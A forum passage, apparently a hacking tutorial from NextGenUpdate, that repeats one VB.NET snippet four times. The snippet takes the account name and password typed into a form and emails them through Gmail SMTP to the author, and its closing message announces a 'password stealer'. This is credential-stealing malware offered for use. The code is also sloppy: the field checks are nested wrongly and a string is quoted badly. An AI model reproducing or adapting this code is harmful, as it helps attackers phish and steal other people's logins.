, Double click on your Button and paste the following code
If Textbox1.Text = "" Then
MsgBox("Account Name Fehlt")
If Textbox2.Text = "" Then
MsgBox("Passwort Fehlt")
Else
End If
End If
Dim smtpServer As New SmtpClient
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Email", "Your password")
'using gmail
smtpServer.port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your email")
mail.To.Add("Your email")
mail.Subject = "Username: & Textbox1.Text"
mail.Body = "Username : " & Textbox1.Text & ", " & "Password : " & Textbox2.Text
smtpServer.Send(mail)
MsgBox("Congratulations, You have succesfully created a password stealer.. Login into your mail, and see the username and password
")

, Double click on your Button and paste the following code
If Textbox1.Text = "" Then
MsgBox("Account Name Fehlt")
If Textbox2.Text = "" Then
MsgBox("Passwort Fehlt")
Else
End If
End If
Dim smtpServer As New SmtpClient
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Email", "Your password")
'using gmail
smtpServer.port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your email")
mail.To.Add("Your email")
mail.Subject = "Username: & Textbox1.Text"
mail.Body = "Username : " & Textbox1.Text & ", " & "Password : " & Textbox2.Text
smtpServer.Send(mail)
MsgBox("Congratulations, You have succesfully created a password stealer.. Login into your mail, and see the username and password
")

, Double click on your Button and paste the following code
If Textbox1.Text = "" Then
MsgBox("Account Name Fehlt")
If Textbox2.Text = "" Then
MsgBox("Passwort Fehlt")
Else
End If
End If
Dim smtpServer As New SmtpClient
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Email", "Your password")
'using gmail
smtpServer.port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your email")
mail.To.Add("Your email")
mail.Subject = "Username: & Textbox1.Text"
mail.Body = "Username : " & Textbox1.Text & ", " & "Password : " & Textbox2.Text
smtpServer.Send(mail)
MsgBox("Congratulations, You have succesfully created a password stealer.. Login into your mail, and see the username and password
")

, Double click on your Button and paste the following code
If Textbox1.Text = "" Then
MsgBox("Account Name Fehlt")
If Textbox2.Text = "" Then
MsgBox("Passwort Fehlt")
Else
End If
End If
Dim smtpServer As New SmtpClient
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Email", "Your password")
'using gmail
smtpServer.port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your email")
mail.To.Add("Your email")
mail.Subject = "Username: & Textbox1.Text"
mail.Body = "Username : " & Textbox1.Text & ", " & "Password : " & Textbox2.Text
smtpServer.Send(mail)
MsgBox("Congratulations, You have succesfully created a password stealer.. Login into your mail, and see the username and password
")

Copyright © 2026, NextGenUpdate.
All Rights Reserved.